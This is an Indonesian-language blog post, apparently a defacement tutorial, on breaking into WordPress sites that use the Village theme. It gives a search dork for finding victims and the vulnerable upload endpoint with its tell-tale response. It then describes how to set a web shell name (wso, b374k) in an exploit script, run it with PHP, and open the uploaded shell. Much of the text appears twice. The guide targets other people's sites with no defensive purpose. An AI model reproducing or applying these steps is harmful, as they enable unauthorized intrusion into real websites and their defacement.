Okee agan agan kali ini ane akan Share deface dengan Wordpress Village Themes, langsung aja gausah banyak cocot :v kalo ada salah nya minta maaf :D
Bahan Bahan:
▐ Dork: inurl:/wp-content/themes/village/ use your brain
▐ Xampp
▐ Shell
▐ Exploit
Download dulu xampp nya kang, kalo udah instal langsung, copykan Exploitnya ke Notepad save dengan ekstensi ".php" Contoh: village.php .save di Folder "C:\xampp\php" shell nya jangan lupa di taro di Folder "C:\xampp\php" juga , jadi Shell sama Exploitnya ada di Folder php.
Cuss dehh cari target :v pake dork di atas kalo udah ketemu masukan exploit ini di akhir Url nya:
/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php jadi http://localhost/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php
kalo Vuln ada tulisan {"error":"No files were uploaded."}.
Tinggal akses Shell nya dehh
http://localhost/wp-content/themes/village/blueprint/gallery/ajaxupload/server/uploads/namashell.php
Susah Sudah pahamkan :v yooo kalo ra ngarti ojo isin isin tanya saia
Sekian tutor dari ane :D
Bahan Bahan:
▐ Dork: inurl:/wp-content/themes/village/ use your brain
▐ Xampp
▐ Shell
▐ Exploit
Download dulu xampp nya kang, kalo udah instal langsung, copykan Exploitnya ke Notepad save dengan ekstensi ".php" Contoh: village.php .save di Folder "C:\xampp\php" shell nya jangan lupa di taro di Folder "C:\xampp\php" juga , jadi Shell sama Exploitnya ada di Folder php.
Cuss dehh cari target :v pake dork di atas kalo udah ketemu masukan exploit ini di akhir Url nya:
/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php jadi http://localhost/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php
kalo Vuln ada tulisan {"error":"No files were uploaded."}.
Buka Exploit php tadi di ...http://localhost/wp-content/... localhost nya di ganti dengan target ente, nah di bagian atas ada kode $uploadfile="wso.php"; wso.php itu nama Shell ane, kalo ente make shell b374k 1n7ection andela or yang laen yaa di ganti misalkan $uploadfile="1n7ection.php"; kalo udah save lagi
Buka Cmd ketikkan: "cd C:\xampp\php" enter kallo udah ketikkan lagi "php namaexploit.php" [Tanpa Tanda kutip] lalu enter kalo berhasil responnya {"success":true}
http://localhost/wp-content/themes/village/blueprint/gallery/ajaxupload/server/uploads/namashell.php
Sekian tutor dari ane :D
Comments
Post a Comment